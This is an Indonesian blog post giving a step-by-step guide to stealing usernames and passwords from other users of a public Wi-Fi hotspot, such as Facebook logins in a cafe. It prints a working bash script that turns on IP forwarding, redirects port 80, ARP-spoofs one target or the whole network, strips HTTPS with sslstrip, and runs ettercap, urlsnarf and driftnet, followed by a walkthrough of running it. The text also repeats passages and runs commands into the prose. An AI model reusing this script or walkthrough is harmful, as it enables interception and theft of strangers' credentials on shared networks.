Memantau Jaringan dengan Script Sniffing
Wah hari ini saya mau kasih tau nih salah satu cara memantau username sama password di jaringan. Jadi hal ini hanya bisa di lakukkan di tempat-tempat yang ada jaringannya misalnya aja hotspot di cafe-cafe atau yang lain 
. Apa sih sebenernya salah satu caranya itu? Oke ini gua kasih tau caranya yaitu menggunakan Script Sniffing gimana cara penggunaannya oke cekibrott!!! :
Oke pertama tentunya harus kita buat dulu file scriptnya, scriptnya ini berhubung menggunakan bahasa pemrograman bash jadi kalo bikin filenya di terakhir nama filenya ditambahin .sh . Oke langsung aja buka terminal seperti biasa terus ketikkan perintah berikut pada terminal:
hahahaha
. Apa sih sebenernya salah satu caranya itu? Oke ini gua kasih tau caranya yaitu menggunakan Script Sniffing gimana cara penggunaannya oke cekibrott!!! :Oke pertama tentunya harus kita buat dulu file scriptnya, scriptnya ini berhubung menggunakan bahasa pemrograman bash jadi kalo bikin filenya di terakhir nama filenya ditambahin .sh . Oke langsung aja buka terminal seperti biasa terus ketikkan perintah berikut pada terminal:
41D1L@bt:~# gedit sniff.shnah setelah anda ketikkan perintah di atas entar akan muncuk text editor. Nah isikan di test editor tersebut dengan sciript Sniffingnya seperti berikut “Ente Copas Aja Bro”:
Setelah semua selesai di copy sekarang anda save filenya dengan menekan ctrl + s#!/bin/bash
# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT5
# BY gHero,cseven,spudgunman.
# Ver 0.3
# ASCII sniff.sh
echo ‘
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
‘
echo ’1′ > /proc/sys/net/ipv4/ip_forward
iptables –flush
sleep 1
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
# Arpspoof
echo -n -e “Would you like to ARP a (T)arget or full (N)etwork? “;
read ARPOP
if [ "$ARPOP" == "T" ] ; then
echo
echo -e ‘\E[30;42m’”<Arpspoof Configuration>”; tput sgr0
echo ‘————————’
echo -n -e ‘\E[37;41m’”Client IP address: “; tput sgr0
read IP1
echo -n -e ‘\E[30;47m’”Router’s IP address: “; tput sgr0
read IP2
echo -n -e ‘\E[37;44m’”Enter your Interface for example <eth0 or wlan0>: “; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e ‘arpspoof -i ‘$INT’ -t ‘$IP1′ ‘$IP2′; bash’ &
else
echo
echo -e ‘\E[30;42m’”<Arpspoof Configuration>”; tput sgr0
echo ‘————————’
echo -n -e ‘\E[30;47m’”Router’s IP address: “; tput sgr0
read IP2
echo -n -e ‘\E[37;44m’”Enter your Interface for example <eth0 or wlan0>: “; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e ‘arpspoof -i ‘$INT’ ‘$IP2′; bash’ &
fi
# SSLSTRIP
xterm -fg green4 -bg grey0 -e ‘python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash’ &
# ETTERCAP
xterm -fg green4 -bg grey0 -e ‘ettercap -T -q -i ‘$INT’ ; bash’ &
# URLSNARF
xterm -fg green4 -bg grey0 -e ‘urlsnarf -i ‘$INT’ | grep http > urlsnarf_log.txt ; bash’ &
# DRIFTNET
driftnet -p -i $INT &
41D1L@bt:~# ./sniff.shatau
41D1L@bt:~# bash sniff.shnah setelah anda ketikkan perintah di atas nanti akan muncul seperti berikut:
.__ _____ _____ .__Nah kemudian kita di suruh milih T untuk Target atau N untuk Network. Jadi misalnya kita sudah punya ip target kita dapat memilih T untuk fokus ke satu target, tetapi jika kita belum punya IP Target kita menggunakannya Network jadi semua IP yang terhung dapat kita Pantau. Disini misalnya kita menggunakan Network jadi Kita masukkan N:
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
Would you like to ARP a (T)arget or full (N)etwork?
Would you like to ARP a (T)arget or full (N)etwork? NSetelah muncul seperti berikut:
<Arpspoof Configuration>nah untuk mengisi IP address itu kita masukkan IP router jaringan kita biasanya sih itu bisa kita ambil dari ip kita tpi ip paling belakang kita di ganti 1. Jadi misalkan ip kita 168.88.88.109 mak ip routernya 168.88.88.1 , tetapi perlu diingat tidak semua jaringan menggunakan ip router belakangnya 1. Oke langusung saja kita masukkan 168.88.88.1
————————
Router’s IP address:
Router’s IP address: 168.88.88.1setelah memasukkan ip router kemudian kita di suruh memasukkan interface apa yang kita gunakan berhubung kita berada pada jaringan hotspot tentun interface yang kita gunakan adalah wireless jadi yang kita masukkan adalah wlan0 seperti berikut:
Enter your Interface for example <eth0 or wlan0>:
Router’s IP address: 168.88.88.1Nah setelah memasukkan wlan0 kemudian akan secara otomatis 4 terminal baru nah ini tinggal kita perhatiin aja 4 terminal tersebut siapa tau ada yang lg mau loggin facebokk nah kita bisa liat tuh username sama password. Nah untuk percobaan silahkan suruh temen anda login facebok pada jaringan hotspot yang sama dengan anda dan rasakan hasilnya
Enter your Interface for example <eth0 or wlan0>: wlan0
hahahaha
Posted by D'guns.net
on 19.28.
Filed under